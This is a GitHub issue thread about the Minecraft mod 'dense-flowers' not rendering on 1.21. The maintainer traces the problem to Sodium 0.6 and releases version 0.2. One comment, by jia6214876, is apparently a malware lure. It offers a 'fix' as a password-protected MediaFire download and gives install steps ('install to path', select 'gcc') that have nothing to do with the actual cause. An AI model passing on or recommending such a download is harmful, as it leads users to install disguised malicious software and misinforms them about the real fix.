### ISSUE TITLE
Somehow it's not working for me 1.21

### ISSUE THREAD

**Issue by makumaku1974** [ToBinio/dense-flowers#2]
As you can see it is not dense. If you want my log file I could send it if there's something wrong with my game.

![image](https://github.com/user-attachments/assets/bd7b90e9-14cd-42d2-8dd5-db15d8edab0e)

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ToBinio** [comment]
are you using sodium 0.6? if so 0.1 of the mod doesn't yet support it.
I am working on 0.2 of the mod which supports sodium but I am running into some weird crash only happening outside of my dev environment

**Comment by ToBinio** [comment]
just released [0.2](https://modrinth.com/mod/dense-flowers/version/0.2.0+mc1.21.0) which should hopefully now work
please let me know if this was / fixed your problem

**Comment by makumaku1974** [comment]
> are you using sodium 0.6? if so 0.1 of the mod doesn't yet support it. I am working on 0.2 of the mod which supports sodium but I am running into some weird crash only happening outside of my dev environment

yes yes i was.. I really was weirded out why it's not showing up haha.

**Comment by makumaku1974** [comment]
> just released [0.2](https://modrinth.com/mod/dense-flowers/version/0.2.0+mc1.21.0) which should hopefully now work please let me know if this was / fixed your problem

will do. I just love this mod too much.

**Comment by ToBinio** [comment]
should be fixed
